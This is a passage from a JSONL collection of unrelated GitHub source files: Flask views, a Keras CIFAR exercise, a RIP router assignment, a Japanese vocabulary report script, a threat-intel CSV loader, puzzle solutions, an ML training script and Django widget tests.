frequency')\n plt.ylabel(\"Ampltude\")\n plt.show()\n plt.close()\n\n print(\"Finished Listening...\")\n stream.stop_stream()\n stream.close()\n audio.terminate()\n\n waveFile = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n waveFile.setnchannels(CHANNELS)\n waveFile.setsampwidth(audio.get_sample_size(FORMAT))\n waveFile.setframerate(RATE)\n waveFile.writeframes(b''.join(frames))\n waveFile.close()\n\n extracter = []\n counter = 0\n extractAmp=[]\n for i in range(100, 4000):\n if outAmp[i] > 100000:\n extracter.append(i)\n extractAmp.append(outAmp[i])\n mean = 0\n maxFrequency = 0\n varianceFreq = 0\n size = len(extracter)\n for j in range(0, size):\n freqVal = extracter[j]\n mean += freqVal\n varianceFreq += freqVal ** 2\n if freqVal > maxFrequency:\n maxFrequency = freqVal\n if size == 0:\n varianceFreq = 0\n mean = 0\n else:\n mean = mean / size\n varianceFreq = (varianceFreq / size) - mean ** 2\n\n statData = open('statdata.txt', 'r')\n previous_data = (statData.read()).split('\\n')\n statData.close()\n open('statdata.txt', 'w').close()\n\n if len(previous_data)<8:\n previous_data=[0,0,0,0,mean,0,varianceFreq,0]\n\n previous_data_size = int(previous_data[0])\n previous_mean = float(previous_data[1])\n previous_variance = int(float(previous_data[2]))\n mean_max = int(float(previous_data[3]))\n mean_min = int(float(previous_data[4]))\n variance_max = int(float(previous_data[5]))\n variance_min = int(float(previous_data[6]))\n trainingSampleNumber = int(previous_data[7])+1\n\n if mean_maxmean or mean_min==0:\n mean_min=mean\n if variance_max
', methods=['GET', 'POST'])\n@login_required_staff\ndef edit(id, yymm, dd):\n item = AbsenceLog.get_or_404((id, yymm, dd))\n form = AbsenseLogForm(obj=item)\n if form.validate_on_submit():\n form.populate_obj(item)\n db.session.add(item)\n try:\n db.session.commit()\n flash('欠席時対応加算記録を更新しました','success')\n return redirect(url_for('absencelogs.index', yymm=yymm))\n except Exception as e:\n db.session.rollback()\n flash('欠席時対応加算記録更新時にエラーが発生しました {}'.format(e), 'danger')\n app.logger.exception(e)\n return render_template('absencelogs/edit.pug', item=item, form=form)\n\n@bp.route('//report')\n@login_required_staff\ndef report(yymm):\n with BytesIO() as output:\n report = AbsenceLogReport(yymm)\n report(output)\n response = make_response(output.getvalue())\n response.mimetype = 'application/pdf'\n return response\n","repo_name":"abtoc/ofpp-app","sub_path":"flaskr/views/absencelogs.py","file_name":"absencelogs.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5348211607","text":"from keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras import layers\nimport random\nimport numpy as np\nimport cv2\n\nlabel_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n# Wczytywanie danych\nnum_pixels = x_train[1] * x_train[2] * x_train[3]\n\n# spłaszczenie danych z 3d (32x32x3) do 1d\n\nx_train = x_train.reshape((50000,32,32,3))\nx_train = x_train.astype('float32') / 255\nx_test = x_test.reshape((10000,32,32,3))\nx_test = x_test.astype('float32') / 255\n\n# Tworzenie listy klas\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\n# Tworzenie modelu sieci\nmodel = Sequential()\n\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.Flatten())\n# model.add(layers.Conv2D(32, (3, 3), activation='relu'))\n# model.add(layers.MaxPooling2D((2, 2)))\n# model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n# model.add(layers.Flatten())\n\nmodel.add(layers.Dense(10, activation='softmax'))\n\n\n# Kompilacja modelu\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# Uczenie modelu danymi\n# epoch - liczba iteracji\n# batch_size - liczba elemenów z danych treningowych branych podczas pojedyńczego przejścia funkcji uczącej\nhistory = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=50, batch_size=500, verbose=1)\n\n# Testowanie modelu\nscores = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Baseline Error: %.2f%%\" % (100-scores[1]*100))\n\nmodel.summary()\n\n\nrandom_number = random.randint(0, 50000)\n\nresult = model.predict(x_train[random_number].reshape(1, 32, 32, 3), batch_size=1)\npredicted_class = np.where(result[0] == result[0].max())\nprint(label_names[predicted_class[0][0]])\n\ncv2.imshow('Check if the function works!!', x_train[random_number])\ncv2.waitKey(0)\n\n\n\n\n\n","repo_name":"pawelb95/PraktykaProgramowaniaPython","sub_path":"Keras exercise/Keras - Cifar exercise.py","file_name":"Keras - Cifar exercise.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25947080291","text":"from sim.api import *\nfrom sim.basics import *\n\n'''\nCreate your RIP router in this file.\nYanming & Beidi \nOct15 15:06\n'''\nclass RIPRouter (Entity):\n def __init__(self):\n \"\"\"\n forwarding table is a dictionary, its key is the possible out_going path(port) it can choose, in other words, first row of the table; its value is a tuple containing the destination and the cost going from one particular port\n \"\"\"\n # Add your code here!\n # key: dest; value: (distance, port)\n self.forward = {}\n # key: port; value: neighbor\n self.dict = {}\n \n def handle_rx (self, packet, port):\n # Add your code here!\n if packet.__class__.__name__ == \"DiscoveryPacket\":\n if packet.is_link_up:\n self.forward[packet.src] = (port, 1)\n self.dict[port] = packet.src\n else:\n self.forward[packet.src] = (port, 100)\n self.dict[port] = packet.src\n \n update = RoutingUpdate()\n for d in self.forward.keys():\n update.add_destination(d, self.forward[d][1])\n for pt in self.dict.keys():\n if pt != port:\n self.send(update, pt, flood = False)\n \n elif packet.__class__.__name__ == \"RoutingUpdate\":\n dests = packet.all_dests()\n source = packet.src\n flag = False\n for d in dests:\n if d == self:\n pass\n else:\n neighbor = self.dict[port]\n distance = self.forward[neighbor][1]\n \n if d not in self.forward.keys():\n self.forward[d] = (port, distance + packet.get_distance(d))\n flag = True\n else:\n origin = self.forward[d][1]\n value = packet.get_distance[d] + distance\n if origin == value:\n ori_port = self.forward[d][0]\n if ori_port > port:\n self.forward[d][0] = port\n flag = True\n elif origin > value:\n self.forward[d] = (port, value)\n flag = True\n if flag:\n update = RoutingUpdate()\n for d in self.forward.keys():\n update.add_destination(d, self.forward[d][1])\n for pt in self.dict.keys():\n if pt != port:\n self.send(update, pt, flood = False)\n \n else:\n if packet.dst == self:\n pass\n else:\n self.send(packet,self.forward[packet.dst][0], flood = False)\n\n\n","repo_name":"lucaschenex/Routing","sub_path":"rip_router_old.py","file_name":"rip_router_old.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40872781869","text":"import sys\nimport unicodedata\nimport argparse\nfrom collections import Counter\n\nfrom sudachi import analyze_single\n\nTOP_WORDS_COUNT = 2000\nKNOWN_AHEAD_COUNT = 100\nMAX_GOOD_SENTENCES = 20\nMAX_NEED_SENTENCES = 20\nMAX_LINES_TO_CHECK = 3_000_000\n\nFILTER_NORMALS = '''\nは\nの\nて\nに\nを\nが\nた\nだ\nと\nも\nで\nか\nです\nな\nよ\nない\nね\nから\nれる\nば\nって\nます\nけれど\nまで\nず\nわ\nへ\nし\nぞ\nてる\nられる\nとく\nけ\nふっ\nユー\nはあはあ\nさせる\n〞\nンンッ\nわっ\nあっ\nああ\nえっ\nんっ\nはあ\nうう\nあー\nおお\nおっ\nなあ\nうわ\nえー\nあれ\nはっ\nうー\nえーと\nへえ\nふふ\nくっ\nねえ\nわあ\nあはは\nあの\nむ\nふん\nいや\nいー\nふう\nふふふ\nきゃあ\nおー\nうお\nははは\nぎゃあ\nやあ\nうふふ\nんー\nほう\nおっと\nえい\nえへ\n'''\n\nFILTER_NORMALS_SET = set([s.strip() for s in FILTER_NORMALS.split('\\n') if s.strip()])\n\nKANA_KANJI_TABLE = dict.fromkeys(i for i in range(sys.maxunicode) if not any((s in unicodedata.name(chr(i), '') for s in ['KATAKANA', 'HIRAGANA', 'CJK'])))\ndef extract_kana_kanji(text):\n return text.translate(KANA_KANJI_TABLE)\n\ndef include_for_refold(analysis):\n (orig, fields_str, normal) = analysis\n\n if not extract_kana_kanji(orig):\n return False # no Japanese characters\n\n if fields_str.startswith('名詞,固有名詞,'):\n return False # name\n\n if normal in FILTER_NORMALS_SET:\n return False\n\n return True\n\ndef find_sentences(target_normal, sorted_toks_fn, known_normals_set):\n # so we can still target a word if it is known\n adjusted_known_normals_set = known_normals_set.copy()\n if target_normal in adjusted_known_normals_set:\n adjusted_known_normals_set.remove(target_normal)\n\n line_count = 0\n good_sents = []\n need_sents = []\n with open(sorted_toks_fn) as f:\n for line in f:\n line_count += 1\n sline = line.rstrip('\\n')\n\n (text, toks_str) = sline.split('\\t')\n\n toks_set = set(toks_str.split('|')) if toks_str else set()\n\n unknown_toks = toks_set.difference(adjusted_known_normals_set)\n\n if target_normal in unknown_toks:\n other_toks = unknown_toks.difference(set([target_normal]))\n all_others_known = (len(other_toks) == 0)\n if all_others_known:\n good_sents.append(text)\n else:\n need_sents.append(text + ' missing: ' + ', '.join(other_toks))\n\n if (len(good_sents) >= MAX_GOOD_SENTENCES) and (len(need_sents) >= MAX_NEED_SENTENCES):\n break\n if line_count >= MAX_LINES_TO_CHECK:\n break\n\n return (good_sents[:MAX_GOOD_SENTENCES], need_sents[:MAX_NEED_SENTENCES])\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('sortedtoks', help='tsv of (text, toks) sorted by descending goodness')\n parser.add_argument('freqtext', nargs='+', help='may have an integer specified like FN:WEIGHT')\n args = parser.parse_args()\n\n combined_normal_count = Counter()\n combined_normal_breakdown = {}\n\n sum_weights = 0\n for freqtext in args.freqtext:\n if ':' in freqtext:\n freqtext_fn, weight_str = freqtext.split(':')\n weight = int(weight_str)\n else:\n weight = 1\n freqtext_fn = freqtext\n sum_weights += weight\n\n analyses = [a for a in analyze_single(open(freqtext_fn).read()) if include_for_refold(a)]\n\n normal_count = Counter(normal for (orig, analysis, normal) in analyses)\n total_count = sum(normal_count.values())\n for (normal, count) in normal_count.items():\n combined_normal_count[normal] += weight*(count/total_count)\n\n normal_breakdown = {}\n for (orig, analysis, normal) in analyses:\n normal_breakdown.setdefault(normal, Counter())\n normal_breakdown[normal][(orig, analysis)] += 1\n for (normal, orig_analysis_counter) in normal_breakdown.items():\n total_count = sum(orig_analysis_counter.values())\n combined_normal_breakdown.setdefault(normal, Counter())\n for (orig_analysis, count) in orig_analysis_counter.items():\n combined_normal_breakdown[normal][orig_analysis] += weight*(count/total_count)\n\n known_set = FILTER_NORMALS_SET.copy()\n for (normal, _) in combined_normal_count.most_common(KNOWN_AHEAD_COUNT):\n known_set.add(normal)\n\n print('REPORT OF TOP %d WORDS' % TOP_WORDS_COUNT)\n print('NOTE: It is assumed that the first %d words are known from the beginning, so as to be able to find some sentences.' % KNOWN_AHEAD_COUNT)\n print()\n\n word_num = 0\n for (normal, count) in combined_normal_count.most_common(TOP_WORDS_COUNT):\n word_num += 1\n print(78*'-')\n print('\\t'.join([normal, '#%d, %.6f%% of words' % (word_num, 100*count/sum_weights)]))\n print()\n\n print('occurs as:')\n for ((orig, fields_str), count) in combined_normal_breakdown[normal].most_common():\n print(' ' + '\\t'.join([orig, fields_str, '%.2f%%' % (100*count/sum_weights)]))\n print()\n\n (good_sents, need_sents) = find_sentences(normal, args.sortedtoks, known_set)\n known_set.add(normal)\n\n print('top sentences using this word where all words known:')\n for s in good_sents:\n print(' ' + s)\n print()\n\n print('top sentences using this word where NOT all words known:')\n for s in need_sents:\n print(' ' + s)\n print()\n","repo_name":"rsimmons/massif","sub_path":"backend/ordering/refold_report.py","file_name":"refold_report.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"76"} +{"seq_id":"38165221688","text":"import csv\nimport gzip\nimport os\n\nfrom stream_alert.rule_processor import LOGGER\n\nclass StreamThreatIntel(object):\n \"\"\"Load intelligence from csv.gz files into a dictionary.\"\"\"\n IOC_KEY = 'streamalert:ioc'\n\n __intelligence = {}\n __config = {}\n\n @classmethod\n def read_compressed_files(cls, intel_dir, delimiter=','):\n \"\"\"Read intelligence into memory\n\n Read all intelligence from csv.gz files located in threat_intel\n directory into a dictionary. CSV filename should follow the convention\n .csv.gz. The basename (without extension) of csv\n file will be the key in return dictionary.\n\n Returns:\n (dict): Threat intelligence in the following format:\n {\n \"domain\": {\n \"evil1.com\": [\"apt_domain\", \"source1 reported evil1.com\"],\n \"evil2.com\": [\"c2_domain\", \"source2 reported evil2.com\"]\n },\n \"ip\": {\n \"1.1.1.2\": [\"scan_ip\", \"source reported ip1\"],\n \"2.2.2.2\": [\"scan_ip\", \"source reported ip2\"]\n },\n \"url\": {\n \"www.hacker.com/evil_page\": [\"mal_url\", \"source_foo\"]\n },\n \"md5\": {\n \"0123456789abcdef0123456789abcdef\": [\"mal_md5\", \"source_bar\"]\n }\n }\n None: if the intelligence directory does not exist\n \"\"\"\n if not os.path.exists(intel_dir):\n return\n\n gz_files = [os.path.join(intel_dir, gz_file) for gz_file\n in os.listdir(intel_dir)\n if gz_file.endswith('.gz')]\n\n for gz_file in gz_files:\n with gzip.open(gz_file, 'r') as ioc_file:\n csv_reader = csv.reader(ioc_file, delimiter=delimiter)\n ioc_type = os.path.basename(gz_file).split('.')[0]\n if ioc_type not in cls.__intelligence:\n cls.__intelligence[ioc_type] = dict()\n for row in csv_reader:\n if len(row) < 2:\n LOGGER.debug('Warning, each row in CSV file should '\n 'contain at least two fields. Bad row [%s]',\n row)\n continue\n cls.__intelligence[ioc_type][row[0]] = row[1:]\n\n return cls.__intelligence\n\n @classmethod\n def load_intelligence(cls, config, intel_dir='threat_intel'):\n \"\"\"Load intelligence from csv.gz files into a dictionary\n\n Args:\n intel_dir (str): Location where stores compressed intelligence\n \"\"\"\n if cls.__intelligence:\n return\n if (config.get('threat_intel')\n and config['threat_intel'].get('enabled')\n and config['threat_intel'].get('mapping')):\n cls.__intelligence = cls.read_compressed_files(intel_dir)\n cls.__config = config['threat_intel'].get('mapping')\n\n @classmethod\n def get_intelligence(cls):\n return cls.__intelligence\n\n @classmethod\n def get_config(cls):\n return cls.__config\n","repo_name":"OpenGovDataMirror/A_gsa_streamalert","sub_path":"stream_alert/rule_processor/threat_intel.py","file_name":"threat_intel.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19863564599","text":"def uncompress(line):\n newLine = \"\"\n index = 0\n while index < len(line):\n if line[index] == \"(\":\n marker = \"\"\n while line[index] != \")\":\n marker = marker + line[index]\n index += 1\n numChar, repeat = marker[1:].split(\"x\") # ) is not included because while loop stops when it encounters )\n index += 1\n for i in range(int(repeat)):\n newLine = newLine + line[index:index+int(numChar)]\n index += int(numChar)\n else:\n newLine = newLine + line[index]\n index += 1\n return newLine\n\ndef getMarker(line):\n marker = \"\"\n index = 0\n while line[index] != \")\":\n marker += line[index]\n index += 1\n numChar, repeat = marker[1:].split(\"x\") # ) is not included because while loop stops when it encounters )\n index += 1\n return int(numChar), int(repeat), index\n\ndef expandMaker(line):\n newLine = \"\"\n numChar, repeat, mIndex = getMarker(line)\n index = mIndex\n for i in range(repeat-1):\n newLine += line[index:index+numChar]\n return newLine, index\n\n\"\"\"\ndef uncompressV2(line):\n total = 0\n index = 0\n while index < len(line):\n if line[index] == \"(\":\n line = line[index:]\n index = 0\n rLine, rIndex = expandMaker(line[index:])\n index += rIndex\n line = line[:index] + rLine + line[index:]\n else:\n total += 1\n index += 1\n return total\n\"\"\"\ndef uncompressV2(line):\n #algorithm from https://www.reddit.com/r/adventofcode/comments/5hbygy/2016_day_9_solutions/dazentu/\n values = [1 for i in range(len(line))]\n total = 0\n i = 0\n while i < len(line):\n if line[i] == \"(\":\n numChar, repeat, index = getMarker(line[i:])\n for j in range(numChar):\n values[i+j+index] *= repeat\n i += index\n else:\n total += values[i]\n i += 1\n return total\n\n\n\n\n\ninFile = open(\"input.txt\", \"r\")\nlines = inFile.readlines()\ninFile.close()\n\nline = lines[0]\n\nnewLine = uncompress(line)\nprint(len(newLine))\n#first solution is 123908\n\nprint(uncompressV2(\"(25x3)(3x3)ABC(2x3)XY(5x2)PQRSTX(18x9)(3x2)TWO(5x7)SEVEN\"))\nprint(uncompressV2(line))\n#final solution is 10755693147","repo_name":"rosskyl/AdventOfCode","sub_path":"2016/Day_9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38052577994","text":"class Solution:\n def findRelativeRanks(self, nums: List[int]) -> List[str]:\n sn = nums.copy()\n sn.sort()\n n = len(nums)\n for i in range(n):\n ins = sn.index(nums[i])\n if ins == n - 1:\n nums[i] = \"Gold Medal\"\n elif ins == n - 2:\n nums[i] = \"Silver Medal\"\n elif ins == n - 3:\n nums[i] = \"Bronze Medal\"\n else:\n nums[i] = str(n - ins)\n return nums\n","repo_name":"k0syan/Leetcode","sub_path":"506_relative_ranks.py","file_name":"506_relative_ranks.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13429827041","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 2 22:16:59 2019\nhttps://qiita.com/nnn112358/items/168e507a34272957b1f3\n@author: PC\n\"\"\"\n\nfrom control.matlab import * # MATLAB-like functions\n\n# System matrics\nA1 = [[0, 1.], [-4, -1]]\nB1 = [[0], [1.]]\nC1 = [[1., 0]]\nsys1ss = ss(A1, B1, C1, 0)\nprint(sys2ss)\n\nsys1tf = ss2tf(sys1ss)\nprint(sys2tf)","repo_name":"hashimoto0106/Control","sub_path":"現代制御/101_状態方程式→伝達関数.py","file_name":"101_状態方程式→伝達関数.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10577108876","text":"import torch\nimport logging\nimport numpy as np\nfrom tqdm import tqdm\nfrom core.engine import losses as mylosses\n\ndef eval_dataset(cfg, model, data_loader, device, model_type='pytorch'):\n logger = logging.getLogger(\"CORE.inference\")\n\n # Create losses\n criterion_logloss = mylosses.LogLoss(reduction=False)\n criterion_jaccard = mylosses.JaccardIndex(reduction=False)\n criterion_dice = mylosses.DiceLoss(reduction=False)\n\n stats = {\n 'sample_count': 0.0,\n 'loss': 0.0,\n 'jaccard': 0.0,\n 'dice': 0.0\n }\n\n for data_entry in tqdm(data_loader):\n images, labels, masks = data_entry\n\n # Forward images\n with torch.no_grad():\n # B,C,H,W = images.shape\n if model_type == 'onnx':\n images_np = images.numpy().astype(np.float32)\n outputs = model.forward(images_np, preprocess=False, postprocess=False)\n outputs = torch.from_numpy(outputs).to(device)\n elif model_type == 'tensorrt':\n images_np = images.numpy().astype(np.float32)\n outputs = model.forward(images_np, preprocess=False, postprocess=False)\n outputs = torch.from_numpy(outputs).to(device) \n elif model_type == 'pytorch':\n images = images.to(device)\n outputs = model(images)\n else:\n logger.error(\"Unknown model type: %s. Aborting...\".format(model_type))\n return -1\n\n # Calculate losses\n targets = labels.to(device)\n masks = masks.to(device)\n\n losses = criterion_logloss.forward(outputs, targets, masks)\n outputs_binarized = torch.threshold(outputs, cfg.TENSORBOARD.METRICS_BIN_THRESHOLD, 0.0)\n jaccard_losses = criterion_jaccard.forward(outputs_binarized, targets)\n dice_losses = criterion_dice.forward(outputs_binarized, targets)\n\n # Reduce loss (mean)\n stats['loss'] += torch.mean(losses).item()\n stats['jaccard'] += torch.mean(jaccard_losses).item()\n stats['dice'] += torch.mean(dice_losses).item()\n stats['sample_count'] += 1\n\n # Return results\n stats['loss'] /= stats['sample_count']\n stats['jaccard'] /= stats['sample_count']\n stats['dice'] /= stats['sample_count']\n\n result_dict = {\n 'loss': stats['loss'],\n 'jaccard': stats['jaccard'],\n 'dice': stats['dice']\n }\n\n return result_dict","repo_name":"NikitaPut/neural_network","sub_path":"land-analyzer-model/core/engine/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10855072021","text":"import heapq\n\ndef solution(jobs):\n heap = []\n answer = 0\n \n start, now = -1, 0\n i = 0\n \n while i < len(jobs):\n for j in jobs:\n if start < j[0] <= now:\n heapq.heappush(heap, [j[1], j[0]])\n if heap:\n d, r = heapq.heappop(heap)\n start = now\n now += d\n answer += now - r\n i += 1\n else:\n now += 1\n \n return answer // len(jobs)","repo_name":"rimmiya/Algorithms","sub_path":"프로그래머스/lv3/42627. 디스크 컨트롤러/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"868796656","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle\n\ndef load_data(geolocation=False, drop=True):\n \n if geolocation:\n df_geo= pd.read_csv('../data/olist_geolocation_dataset.csv')\n df_geo.rename(columns={'geolocation_lng': 'lng',\n 'geolocation_lat': 'lat'}, inplace=True)\n\n return df_geo\n else:\n \n if drop:\n df = pd.read_csv('../data/olist_merge.csv')\n col2drop = ['order_id', 'customer_id', 'order_status', 'order_approved_at', 'order_estimated_delivery_date',\n 'order_delivered_carrier_date', 'order_delivered_customer_date', 'order_estimated_delivery_date',\n 'order_item_id', 'product_id', 'seller_id', 'shipping_limit_date',\n 'payment_sequential',\n 'price', 'review_id', 'review_comment_title', 'review_comment_message', 'review_creation_date',\n 'review_answer_timestamp', 'product_name_lenght', 'product_description_lenght', 'product_photos_qty',\n 'customer_unique_id', 'customer_zip_code_prefix',\n 'seller_zip_code_prefix', 'seller_city', 'seller_state', 'state', \n 'city', 'c_lat_y', 'c_lng_y', 'product_weight_g', 'product_length_cm', 'product_height_cm',\n 'product_width_cm']\n df.rename(columns={'c_lng_x': 'lng',\n 'c_lat_x': 'lat'}, inplace=True)\n \n\n df.drop(col2drop, axis=1, inplace=True)\n df.drop(['lng','lat'], axis=1, inplace=True)\n return df\n\n else:\n df = pd.read_csv('../data/olist_merge.csv')\n return df\n\ndef create_features():\n df_ = load_data(drop=False)\n df = df_.loc[(df_[\"order_purchase_timestamp\"] > \"2018-06-02 00:00:00\"), :]\n col2drop = ['order_purchase_timestamp', 'order_id', 'customer_id', 'order_approved_at', 'order_estimated_delivery_date',\n 'order_delivered_carrier_date', 'order_delivered_customer_date', 'order_estimated_delivery_date',\n 'order_item_id', 'product_id', 'seller_id', 'shipping_limit_date', \n 'price', 'review_id', 'review_comment_title', 'review_comment_message', 'review_creation_date',\n 'review_answer_timestamp', 'product_name_lenght', 'product_description_lenght', 'product_photos_qty',\n 'customer_unique_id', 'customer_zip_code_prefix',\n 'seller_zip_code_prefix', 'seller_city', 'seller_state', 'state', 'c_lat_x',\n 'c_lng_x', 'city', 'c_lat_y', 'c_lng_y']\n\n df.drop(col2drop, axis=1, inplace=True)\n\n # Missing value for product columns\n df[\"product_weight_g\"] = df[\"product_weight_g\"].fillna(df[\"product_weight_g\"].median())\n df[\"product_length_cm\"] = df[\"product_length_cm\"].fillna(df[\"product_length_cm\"].median())\n df[\"product_height_cm\"] = df[\"product_height_cm\"].fillna(df[\"product_height_cm\"].median())\n df[\"product_width_cm\"] = df[\"product_width_cm\"].fillna(df[\"product_width_cm\"].median())\n df[\"freight_value\"] = df[\"freight_value\"].fillna(df[\"freight_value\"].median())\n df[\"payment_sequential\"] = df[\"payment_sequential\"].fillna(df[\"payment_sequential\"].median())\n # Missing value for review_score\n df[\"review_score\"] = df[\"review_score\"].fillna(df[\"review_score\"].median())\n # Missing value for payment_type\n df[\"payment_type\"] = df[\"payment_type\"].fillna('credit_card')\n # Missing value for payment_installments\n df[\"payment_installments\"] = df[\"payment_installments\"].fillna(df[\"payment_installments\"].median())\n # Missing value for product_category_name\n df[\"product_category_name\"] = df[\"product_category_name\"].fillna(\"None\")\n # Missing value fro payment_values\n df['payment_value'] = df['payment_value'].fillna(df['payment_value'].median())\n\n Y = df['payment_value']\n df.drop([\"payment_value\"], axis=1, inplace=True)\n X = df \n return X, Y\n\ndef label_encoder(dataframe, binary_col):\n labelencoder = LabelEncoder()\n for col in binary_col:\n dataframe[col] = labelencoder.fit_transform(dataframe[col])\n return dataframe\n\nX, Y = create_features()\n\nl_col = ['product_category_name', 'customer_city', 'customer_state', 'payment_type', 'order_status']\nX = label_encoder(X, l_col)\nmodel = RandomForestRegressor()\nrf_fit= model.fit(X, Y)\npickle.dump(rf_fit, open(\"rf_model.pkl\", 'wb'))","repo_name":"seneralkan/olist-streamlit-app","sub_path":"model/rf_model.py","file_name":"rf_model.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8117569312","text":"\"\"\"Stat rendering helpers.\"\"\"\n\nfrom django import template\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef percent_display(part, whole, ndigits=2):\n \"\"\"Percent rendering\"\"\"\n percent = 100 * float(part) / float(whole)\n round_percent = round(percent, ndigits)\n return mark_safe(f\"{round_percent} %\")\n","repo_name":"MTES-MCT/aides-territoires","sub_path":"src/stats/templatetags/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"25460795486","text":"try:\n from unittest import mock\nexcept ImportError:\n try:\n import mock\n except ImportError:\n mock = None\n\nimport os\nimport tempfile\n\nfrom django import forms\nfrom django.contrib.admin.sites import AdminSite\nfrom django.contrib.admin import ModelAdmin\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.messages.storage.fallback import FallbackStorage\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\nfrom django.test import TestCase, RequestFactory\nfrom django.views.generic import FormView\n\nfrom file_resubmit import widgets\nfrom file_resubmit import admin\n\nif not mock:\n raise ImproperlyConfigured(\"For testing mock is required.\")\n\n\n# shortest possible PNG file, courtesy http://garethrees.org/2007/11/14/pngcrush/\nPNG = (\n b'\\x89PNG\\r\\n\\x1a\\n'\n b'\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x08\\x06\\x00\\x00\\x00\\x1f\\x15\\xc4\\x89'\n b'\\x00\\x00\\x00\\nIDATx\\x9cc\\x00\\x01\\x00\\x00\\x05\\x00\\x01\\r\\n-\\xb4'\n b'\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n)\n\n\nclass TestForm(forms.Form):\n pass\n\n\nclass OneFileForm(forms.Form):\n name = forms.CharField(required=True)\n upload_file = forms.FileField(widget=widgets.ResubmitFileWidget())\n\n\nclass OneImageForm(forms.Form):\n name = forms.CharField(required=True)\n upload_image = forms.ImageField(widget=widgets.ResubmitImageWidget())\n\n\nclass BaseResubmitFileMixin(object):\n def setUp(self):\n self.factory = RequestFactory()\n self.temporary_file = tempfile.NamedTemporaryFile(delete=False)\n self.temporary_content = os.urandom(1024)\n self.temporary_file.write(self.temporary_content)\n self.temporary_file.close()\n self.temporary_image = tempfile.NamedTemporaryFile(suffix=\".png\", delete=False)\n self.temporary_image.write(PNG)\n self.temporary_image.close()\n \n def get_resubmit_field(self, form, field_name):\n resubmit_field_name = '{fn}_cache_key'.format(fn=field_name)\n name_prefix='name=\"{rfn}\"'.format(rfn=resubmit_field_name)\n value_prefix='value=\"'\n rendered = str(form[field_name])\n self.assertIn(name_prefix, rendered)\n name_prefix_idx = rendered.index(name_prefix)\n value_idx = rendered.index(value_prefix, name_prefix_idx)\n value_close_idx = rendered.index('\"', value_idx + len(value_prefix))\n value = rendered[value_idx + len(value_prefix):value_close_idx]\n return resubmit_field_name, value\n\n\nclass TestResubmitFileWidget(BaseResubmitFileMixin, TestCase):\n class DummyFormView(FormView):\n template_name = 'blank.html' # TemplateView requires this attribute\n form_class = TestForm\n success_url = '/done/'\n\n class OneFileView(DummyFormView):\n form_class = OneFileForm\n\n class OneImageView(DummyFormView):\n form_class = OneImageForm\n\n def test_file_widget(self):\n request = self.factory.get('/example/')\n response = self.OneFileView.as_view()(request)\n form = response.context_data['form']\n file_field = form.fields.get('upload_file')\n self.assertIsInstance(file_field.widget, widgets.ResubmitFileWidget)\n\n def test_file_resubmit(self):\n data = {}\n with open(self.temporary_file.name, 'rb') as fo:\n request = self.factory.post('/example/', {'upload_file': fo})\n response = self.OneFileView.as_view()(request)\n form = response.context_data['form']\n self.assertEqual(len(form.errors), 1)\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'upload_file')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/example/', data)\n resubmit_resp = self.OneFileView.as_view()(resubmit_req)\n form = resubmit_resp.context_data['form']\n uploaded_file = form.cleaned_data['upload_file']\n self.assertEqual(uploaded_file.read(), self.temporary_content)\n \n def test_image_widget(self):\n request = self.factory.get('/example/')\n response = self.OneImageView.as_view()(request)\n form = 